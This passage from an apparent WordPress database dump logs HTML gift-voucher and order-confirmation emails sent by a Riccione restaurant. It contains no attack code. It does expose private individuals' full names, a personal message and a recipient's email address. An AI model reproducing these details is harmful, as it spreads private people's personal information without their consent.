class=\"woocommerce-Price-currencySymbol\">€</span></bdi></span></h3>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"middle\" style=\"text-align: center; background-color: #ffd5d5; padding: 10px;\">\r\n<div>\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; border-spacing: 20px; border: 2px dashed #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"middle\" style=\"padding: 10px 0px; font-family: sans-serif; line-height: 20px; color: #ff9898; text-align: center; border: 3px;\">\r\n<h2 style=\"color: #557da1; display: block; font-weight: bold; line-height: 130%; padding: 0px; margin: 10px 0px; font-family: Arial, Helvetica, sans-serif; font-size: 15px; text-align: center;\">Codice Coupon</h2>\r\n<p style=\"font-size: 25px; font-weight: bold; margin: 0px; text-align: center;\"><img class=\"mwb_wgm_coupon_img\" id=\"1603656130www.ristorantesolymar.it\" src=\"https://www.ristorantesolymar.it/wp-content/uploads/qrcode_barcode/mwb__1603656130solymarcouponB4WIL.png\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></p>\r\n<span style=\"font-size: 15px; text-align: center; padding: 10px 0px;\">(Scadenza. 23/04/2021)</span>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center; padding: 15px; color: #ffffff; background-color: #ff9898; font-size: 18px; font-family: Arial, Helvetica, sans-serif;\">Trovi il regolamento dell\'utilizzo dei Coupon / Buoni regali sul <a href=\"https://www.ristorantesolymar.it/info-privacy/\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">sito</a>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\n</body>\n</html>\n','Sol Y Mar, ristorante a Riccione','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-ristorante-a-riccione-5','','','2020-10-26 09:52:36','2020-10-26 08:52:36','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-5/',0,'postman_sent_mail','',0),(1156,1,'2020-10-26 09:52:36','2020-10-26 08:52:36','<!DOCTYPE html>\n<html>\n<head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"></head>\n<body style=\"padding: 0;\">\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"margin: 0 auto; background-color: #ff9898; border-spacing: 10px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 5px;\">\r\n<table class=\"email-container\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; margin: 0 auto; width: 100%; padding: 10px 0px; border: 2px dashed #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px 0; text-align: left;\"><a style=\"font-weight: normal; text-decoration: none; color: #ffffff; margin-left: 10px;\"><img src=\"http://www.ristorantesolymar.it/wp-content/uploads/2017/07/sol-y-mar-logo-150.png\" width=\"200px\" height=\"150px\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></a></td>\r\n<td style=\"padding: 10px 0; text-align: center;\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2017/07/buono.png\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></td>\r\n</tr>\r\n<tr>\r\n<td class=\"img-block\" style=\"text-align: center; padding: 2px 0px;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n \r\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; margin: auto;\">\r\n<tbody>\r\n<tr>\r\n<td bgcolor=\"#ffffff\" style=\"text-align: center; font-family: sans-serif; font-size: 15px; line-height: 20px; color: #555555;\"></td>\r\n</tr>\r\n<!-- -->\r\n<tr>\r\n<td align=\"center\" valign=\"top\" bgcolor=\"#ffffff\" style=\"padding: 15px;\">\r\n<table border=\"0\" width=\"100%;\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top; width: 50%;\">\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px; text-align: center; width: 50%;\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/mwb_browse/FC219D35-A4C2-40F9-B88E-9A95FB4FD648.jpeg\" width=\"100%\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top;\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"center-on-narrow\" style=\"font-family: sans-serif; font-size: 15px; line-height: 20px; color: #555555; padding: 10px; text-align: left; word-break: break-word;\">\r\n<p style=\"min-height: 180px;\">Ti doniamo un piccolo momento di piacere, per ringraziarti del tempo e delle cure che ci hai dedicato in questi mesi. Grazie zio!</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 0 10px; color: #373737;\">\n<span style=\"float: left; padding: 0 3% 0 0; text-align: right;\">Da :</span><span style=\"width: 75%; float: left; word-break: break-all;\">Amalia e Riccardo Manduchi</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px; color: #373737;\">\n<span style=\"float: left; padding: 0 3% 0 0; text-align: right;\">A :</span><span style=\"width: 75%; float: left; word-break: break-all;\">Filippo Saulle</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px; color: #373737;\">\r\n<h3 style=\"color: #557da1; display: block; font-weight: bold; line-height: 130%; margin: 16px 0 8px; text-align: left; font-size: 30px; font-family: Arial, Helvetica, sans-serif;\"><span class=\"woocommerce-Price-amount amount\"><bdi>100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></bdi></span></h3>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"middle\" style=\"text-align: center; background-color: #ffd5d5; padding: 10px;\">\r\n<div>\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; border-spacing: 20px; border: 2px dashed #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"middle\" style=\"padding: 10px 0px; font-family: sans-serif; line-height: 20px; color: #ff9898; text-align: center; border: 3px;\">\r\n<h2 style=\"color: #557da1; display: block; font-weight: bold; line-height: 130%; padding: 0px; margin: 10px 0px; font-family: Arial, Helvetica, sans-serif; font-size: 15px; text-align: center;\">Codice Coupon</h2>\r\n<p style=\"font-size: 25px; font-weight: bold; margin: 0px; text-align: center;\"><img class=\"mwb_wgm_coupon_img\" id=\"1603656130www.ristorantesolymar.it\" src=\"https://www.ristorantesolymar.it/wp-content/uploads/qrcode_barcode/mwb__1603656130solymarcouponB4WIL.png\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></p>\r\n<span style=\"font-size: 15px; text-align: center; padding: 10px 0px;\">(Scadenza. 23/04/2021)</span>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center; padding: 15px; color: #ffffff; background-color: #ff9898; font-size: 18px; font-family: Arial, Helvetica, sans-serif;\">Trovi il regolamento dell\'utilizzo dei Coupon / Buoni regali sul <a href=\"https://www.ristorantesolymar.it/info-privacy/\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">sito</a>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\n</body>\n</html>\n','Sol Y Mar, ristorante a Riccione','Sent ( ** Fallback ** )','private','closed','closed','','sol-y-mar-ristorante-a-riccione-6','','','2020-10-26 09:52:36','2020-10-26 08:52:36','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-6/',0,'postman_sent_mail','',0),(1157,1,'2020-10-26 09:52:40','2020-10-26 08:52:40','<!DOCTYPE html>\n<html>\n<head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"></head>\n<body style=\"padding: 0;\"><p>Il coupon che hai acquistato è stato inviato via email all\'indirizzo destinatario che hai specificato durante l\'ordine.</p></body>\n</html>\n','Un buono regale per te - Sol Y Mar','Incorrect authentication data\r\n','private','closed','closed','','un-buono-regale-per-te-sol-y-mar-6','','','2020-10-26 09:52:40','2020-10-26 08:52:40','',0,'https://www.ristorantesolymar.it/postman_sent_mail/un-buono-regale-per-te-sol-y-mar-6/',0,'postman_sent_mail','',0),(1158,1,'2020-10-26 09:52:40','2020-10-26 08:52:40','<!DOCTYPE html>\n<html>\n<head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"></head>\n<body style=\"padding: 0;\"><p>Il coupon che hai acquistato è stato inviato via email all\'indirizzo destinatario che hai specificato durante l\'ordine.</p></body>\n</html>\n','Un buono regale per te - Sol Y Mar','Sent ( ** Fallback ** )','private','closed','closed','','un-buono-regale-per-te-sol-y-mar-7','','','2020-10-26 09:52:40','2020-10-26 08:52:40','',0,'https://www.ristorantesolymar.it/postman_sent_mail/un-buono-regale-per-te-sol-y-mar-7/',0,'postman_sent_mail','',0),(1159,1,'2020-10-26 09:52:44','2020-10-26 08:52:44','<!DOCTYPE html>\n<html>\n<head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"></head>\n<body style=\"padding: 0;\">\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"margin: 0 auto; background-color: #ff9898; border-spacing: 10px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 5px;\">\r\n<table class=\"email-container\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; margin: 0 auto; width: 100%; padding: 10px 0px; border: 2px dashed #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px 0; text-align: left;\"><a style=\"font-weight: normal; text-decoration: none; color: #ffffff; margin-left: 10px;\"><img src=\"http://www.ristorantesolymar.it/wp-content/uploads/2017/07/sol-y-mar-logo-150.png\" width=\"200px\" height=\"150px\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></a></td>\r\n<td style=\"padding: 10px 0; text-align: center;\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2017/07/buono.png\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></td>\r\n</tr>\r\n<tr>\r\n<td class=\"img-block\" style=\"text-align: center; padding: 2px 0px;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n \r\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; margin: auto;\">\r\n<tbody>\r\n<tr>\r\n<td bgcolor=\"#ffffff\" style=\"text-align: center; font-family: sans-serif; font-size: 15px; line-height: 20px; color: #555555;\"></td>\r\n</tr>\r\n<!-- -->\r\n<tr>\r\n<td align=\"center\" valign=\"top\" bgcolor=\"#ffffff\" style=\"padding: 15px;\">\r\n<table border=\"0\" width=\"100%;\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top; width: 50%;\">\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px; text-align: center; width: 50%;\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/mwb_browse/FC219D35-A4C2-40F9-B88E-9A95FB4FD648.jpeg\" width=\"100%\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top;\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"center-on-narrow\" style=\"font-family: sans-serif; font-size: 15px; line-height: 20px; color: #555555; padding: 10px; text-align: left; word-break: break-word;\">\r\n<p style=\"min-height: 180px;\">Ti doniamo un piccolo momento di piacere, per ringraziarti del tempo e delle cure che ci hai dedicato in questi mesi. Grazie zio!</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 0 10px; color: #373737;\">\n<span style=\"float: left; padding: 0 3% 0 0; text-align: right;\">Da :</span><span style=\"width: 75%; float: left; word-break: break-all;\">Amalia e Riccardo Manduchi</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px; color: #373737;\">\n<span style=\"float: left; padding: 0 3% 0 0; text-align: right;\">A :</span><span style=\"width: 75%; float: left; word-break: break-all;\">Filippo Saulle</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px; color: #373737;\">\r\n<h3 style=\"color: #557da1; display: block; font-weight: bold; line-height: 130%; margin: 16px 0 8px; text-align: left; font-size: 30px; font-family: Arial, Helvetica, sans-serif;\"><span class=\"woocommerce-Price-amount amount\"><bdi>100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></bdi></span></h3>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"middle\" style=\"text-align: center; background-color: #ffd5d5; padding: 10px;\">\r\n<div>\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; border-spacing: 20px; border: 2px dashed #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"middle\" style=\"padding: 10px 0px; font-family: sans-serif; line-height: 20px; color: #ff9898; text-align: center; border: 3px;\">\r\n<h2 style=\"color: #557da1; display: block; font-weight: bold; line-height: 130%; padding: 0px; margin: 10px 0px; font-family: Arial, Helvetica, sans-serif; font-size: 15px; text-align: center;\">Codice Coupon</h2>\r\n<p style=\"font-size: 25px; font-weight: bold; margin: 0px; text-align: center;\"><img class=\"mwb_wgm_coupon_img\" id=\"1603656083www.ristorantesolymar.it\" src=\"https://www.ristorantesolymar.it/wp-content/uploads/qrcode_barcode/mwb__1603656083solymarcouponB4WIL.png\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></p>\r\n<span style=\"font-size: 15px; text-align: center; padding: 10px 0px;\">(Scadenza. 23/04/2021)</span>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center; padding: 15px; color: #ffffff; background-color: #ff9898; font-size: 18px; font-family: Arial, Helvetica, sans-serif;\">Trovi il regolamento dell\'utilizzo dei Coupon / Buoni regali sul <a href=\"https://www.ristorantesolymar.it/info-privacy/\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">sito</a>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\n</body>\n</html>\n','Sol Y Mar, ristorante a Riccione','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-ristorante-a-riccione-7','','','2020-10-26 09:52:44','2020-10-26 08:52:44','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-7/',0,'postman_sent_mail','',0),(1160,1,'2020-10-26 09:52:44','2020-10-26 08:52:44','<!DOCTYPE html>\n<html>\n<head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"></head>\n<body style=\"padding: 0;\">\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"margin: 0 auto; background-color: #ff9898; border-spacing: 10px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 5px;\">\r\n<table class=\"email-container\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; margin: 0 auto; width: 100%; padding: 10px 0px; border: 2px dashed #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px 0; text-align: left;\"><a style=\"font-weight: normal; text-decoration: none; color: #ffffff; margin-left: 10px;\"><img src=\"http://www.ristorantesolymar.it/wp-content/uploads/2017/07/sol-y-mar-logo-150.png\" width=\"200px\" height=\"150px\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></a></td>\r\n<td style=\"padding: 10px 0; text-align: center;\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2017/07/buono.png\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></td>\r\n</tr>\r\n<tr>\r\n<td class=\"img-block\" style=\"text-align: center; padding: 2px 0px;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n \r\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; margin: auto;\">\r\n<tbody>\r\n<tr>\r\n<td bgcolor=\"#ffffff\" style=\"text-align: center; font-family: sans-serif; font-size: 15px; line-height: 20px; color: #555555;\"></td>\r\n</tr>\r\n<!-- -->\r\n<tr>\r\n<td align=\"center\" valign=\"top\" bgcolor=\"#ffffff\" style=\"padding: 15px;\">\r\n<table border=\"0\" width=\"100%;\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top; width: 50%;\">\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px; text-align: center; width: 50%;\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/mwb_browse/FC219D35-A4C2-40F9-B88E-9A95FB4FD648.jpeg\" width=\"100%\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top;\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"center-on-narrow\" style=\"font-family: sans-serif; font-size: 15px; line-height: 20px; color: #555555; padding: 10px; text-align: left; word-break: break-word;\">\r\n<p style=\"min-height: 180px;\">Ti doniamo un piccolo momento di piacere, per ringraziarti del tempo e delle cure che ci hai dedicato in questi mesi. Grazie zio!</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 0 10px; color: #373737;\">\n<span style=\"float: left; padding: 0 3% 0 0; text-align: right;\">Da :</span><span style=\"width: 75%; float: left; word-break: break-all;\">Amalia e Riccardo Manduchi</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px; color: #373737;\">\n<span style=\"float: left; padding: 0 3% 0 0; text-align: right;\">A :</span><span style=\"width: 75%; float: left; word-break: break-all;\">Filippo Saulle</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px; color: #373737;\">\r\n<h3 style=\"color: #557da1; display: block; font-weight: bold; line-height: 130%; margin: 16px 0 8px; text-align: left; font-size: 30px; font-family: Arial, Helvetica, sans-serif;\"><span class=\"woocommerce-Price-amount amount\"><bdi>100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></bdi></span></h3>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"middle\" style=\"text-align: center; background-color: #ffd5d5; padding: 10px;\">\r\n<div>\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; border-spacing: 20px; border: 2px dashed #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"middle\" style=\"padding: 10px 0px; font-family: sans-serif; line-height: 20px; color: #ff9898; text-align: center; border: 3px;\">\r\n<h2 style=\"color: #557da1; display: block; font-weight: bold; line-height: 130%; padding: 0px; margin: 10px 0px; font-family: Arial, Helvetica, sans-serif; font-size: 15px; text-align: center;\">Codice Coupon</h2>\r\n<p style=\"font-size: 25px; font-weight: bold; margin: 0px; text-align: center;\"><img class=\"mwb_wgm_coupon_img\" id=\"1603656083www.ristorantesolymar.it\" src=\"https://www.ristorantesolymar.it/wp-content/uploads/qrcode_barcode/mwb__1603656083solymarcouponB4WIL.png\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></p>\r\n<span style=\"font-size: 15px; text-align: center; padding: 10px 0px;\">(Scadenza. 23/04/2021)</span>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center; padding: 15px; color: #ffffff; background-color: #ff9898; font-size: 18px; font-family: Arial, Helvetica, sans-serif;\">Trovi il regolamento dell\'utilizzo dei Coupon / Buoni regali sul <a href=\"https://www.ristorantesolymar.it/info-privacy/\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">sito</a>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\n</body>\n</html>\n','Sol Y Mar, ristorante a Riccione','Sent ( ** Fallback ** )','private','closed','closed','','sol-y-mar-ristorante-a-riccione-8','','','2020-10-26 09:52:44','2020-10-26 08:52:44','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-8/',0,'postman_sent_mail','',0),(1161,1,'2020-10-26 09:52:51','2020-10-26 08:52:51','<!DOCTYPE html>\n<html lang=\"it-IT\">\n	<head>\n		<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n		<title>Sol Y Mar, ristorante a Riccione</title>\n	</head>\n	<body leftmargin=\"0\" marginwidth=\"0\" topmargin=\"0\" marginheight=\"0\" offset=\"0\" style=\"padding: 0;\">\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5; margin: 0; padding: 70px 0; width: 100%; -webkit-text-size-adjust: none;\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" height=\"100%\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd; border: 1px solid #dcdcdc; box-shadow: 0 1px 4px rgba(0, 0, 0, 0.1); border-radius: 3px;\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1; color: #ffffff; border-bottom: 0; font-weight: bold; line-height: 100%; vertical-align: middle; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; border-radius: 3px 3px 0 0;\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px; display: block;\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 30px; font-weight: 300; line-height: 150%; margin: 0; text-align: left; text-shadow: 0 1px 0 #7797b4; color: #ffffff; background-color: inherit;\'>Grazie per il tuo ordine</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd;\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px;\">\n															<div id=\"body_content_inner\" style=\'color: #737373; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 14px; line-height: 150%; text-align: left;\'>\n\n<p style=\"margin: 0 0 16px;\">Ciao Marcello,</p>\n<p style=\"margin: 0 0 16px;\">Ti informiamo che abbiamo ricevuto il tuo ordine #1141 ed è in fase di elaborazione.</p>\n\n\n<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>\n	[Ordine #1141] (25 Ottobre 2020)</h2>\n\n<div style=\"margin-bottom: 40px;\">\n	<table class=\"td\" cellspacing=\"0\" cellpadding=\"6\" border=\"1\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; width: 100%; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n		<thead>\n			<tr>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Prodotto</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Quantità</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Prezzo</th>\n			</tr>\n		</thead>\n		<tbody>\n				<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; word-wrap: break-word;\">\n		Buono Regalo (valore a scelta)<ul class=\"wc-item-meta\" style=\"font-size: small; margin: 1em 0 0; padding: 0; list-style: none;\">\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">To Name:</strong> <p style=\"margin: 0;\">Filippo Saulle</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">To:</strong> <p style=\"margin: 0;\"><a href=\"mailto:Filos4@libero.it\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">Filos4@libero.it</a></p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">From:</strong> <p style=\"margin: 0;\">Amalia e Riccardo Manduchi</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">Message:</strong> <p style=\"margin: 0;\">Ti doniamo un piccolo momento di piacere, per ringraziarti del tempo e delle cure che ci hai dedicato in questi mesi. Grazie zio!</p>\n</li>\n</ul>		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			<span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n			<tr>\n			<td colspan=\"3\" style=\"padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n				<p style=\"margin: 0 0 16px;\">Validità 6 mesi dal momento dell\'acquisto</p>\n			</td>\n		</tr>\n		\n		</tbody>\n		